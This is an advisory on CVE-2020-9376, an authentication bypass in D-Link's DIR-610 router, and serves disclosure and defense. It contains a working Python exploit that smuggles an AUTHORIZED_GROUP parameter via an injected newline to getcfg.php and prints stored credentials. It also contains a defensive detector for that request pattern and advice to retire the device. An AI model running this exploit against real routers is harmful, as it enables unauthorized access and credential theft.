Heitor Gouvêa
CVE-2020-9376 - Authentication bypass on D-LINK 610 Router
Summary
The DIR-610 is a router developed and sold by D-Link and distributed in Central and South America. An attacker can use CVE-2020-9376 and CVE-2020-9377 to bypass this device's authentication mechanism and gain access to the router's administration panel, which in turn allows them to execute arbitrary code directly on its operating system.
Description
Exploit
#!/usr/bin/env python3
import sys
import urllib.request
import xml.etree.ElementTree as ET

def main(host, port):
    # POST to getcfg.php asking for the DEVICE.ACCOUNT section of the configuration;
    # the %0a (newline) appends an AUTHORIZED_GROUP=1 line to the request as the
    # device parses it, which is what lets the request through unauthenticated.
    body = b'SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1'
    content = urllib.request.urlopen('http://%s:%s/getcfg.php' % (host, port), body).read()
    root = ET.fromstring(content)
    # each <entry> under the account section carries a user name and its password
    for user in root.findall('./module/device/account/entry'):
        name = user.find('./name').text
        password = user.find('./password').text
        print('User: %s\nPassword: %s\n' % (name, password))

if __name__ == '__main__':
    host, port = sys.argv[1:3]
    main(host, port)
Impact
An attacker can circumvent the authentication mechanisms of this device and gain access to the administration panel and to restricted information, such as the users and passwords present on the device. With those credentials they can then exploit CVE-2020-9377, a remote code execution vulnerability.
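A check a defender could run over captured requests to the router's web interface, as an added example that is not part of this advisory: it flags the getcfg.php request pattern the exploit above relies on (a newline injected into the form body, a client-supplied AUTHORIZED_GROUP, and a request for the credential-bearing DEVICE.ACCOUNT section). The sample requests and their (client, method, path, body) layout are constructed; a real deployment would take them from a network sensor or proxy log in front of the device.

```python
import re
from urllib.parse import unquote

# Constructed sample of requests to the router's web interface, as a network
# sensor or reverse proxy might record them: (client, method, path, body).
SAMPLE_REQUESTS = [
    ("192.0.2.10", "POST", "/getcfg.php", "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1"),
    ("192.0.2.11", "POST", "/getcfg.php", "SERVICES=DEVICE.TIME"),
    ("192.0.2.12", "GET", "/index.php", ""),
    ("192.0.2.13", "POST", "/getcfg.php", "SERVICES=DEVICE.ACCOUNT"),
]

# Configuration sections whose contents include credentials.
SENSITIVE_SERVICES = {"DEVICE.ACCOUNT"}


def classify_request(path, body):
    """Return the reasons a request looks like CVE-2020-9376 abuse (empty if none)."""
    reasons = []
    path, _, query = path.partition("?")
    if path != "/getcfg.php":
        return reasons
    # Inspect both the query string and the body, URL-decoded, so %0a becomes a newline.
    decoded = unquote(query) + "\n" + unquote(body) if query else unquote(body)
    # A newline inside a form-encoded parameter is the injection primitive.
    if "\n" in decoded or "\r" in decoded:
        reasons.append("newline injected into form parameters")
    # AUTHORIZED_GROUP is set by the device, never legitimately by the client.
    if re.search(r"AUTHORIZED_GROUP\s*=", decoded, re.I):
        reasons.append("AUTHORIZED_GROUP supplied by client")
    # Requests for the account section deserve attention even without injection.
    for m in re.finditer(r"SERVICES=([A-Z0-9_.]+)", decoded, re.I):
        if m.group(1).upper() in SENSITIVE_SERVICES:
            reasons.append("request for credential-bearing section %s" % m.group(1))
    return reasons


def find_suspicious(requests):
    """Return [(client, reasons)] for every request that triggers at least one reason."""
    flagged = []
    for client, _method, path, body in requests:
        reasons = classify_request(path, body)
        if reasons:
            flagged.append((client, reasons))
    return flagged


if __name__ == "__main__":
    for client, reasons in find_suspicious(SAMPLE_REQUESTS):
        print("%s: %s" % (client, "; ".join(reasons)))
```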
Mitigation
While D-Link is aware of vulnerabilities involving DIR-610, these products have reached End of Life (EoL)/End of Support (EoS) and there is no extended support or development for them. D-Link will not be able to resolve device or firmware issues as all development and customer support has ceased.
The DIR-610 Rev. Ax reached its End of Support date in 2014; it is no longer supported and firmware development has stopped. All consumers still using the product should retire it and replace the device immediately.
Conclusion
References
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
- https://www.dlink.com.br/produto/dir-610/
- https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A2-Broken_Authentication
- https://portswigger.net/web-security/authentication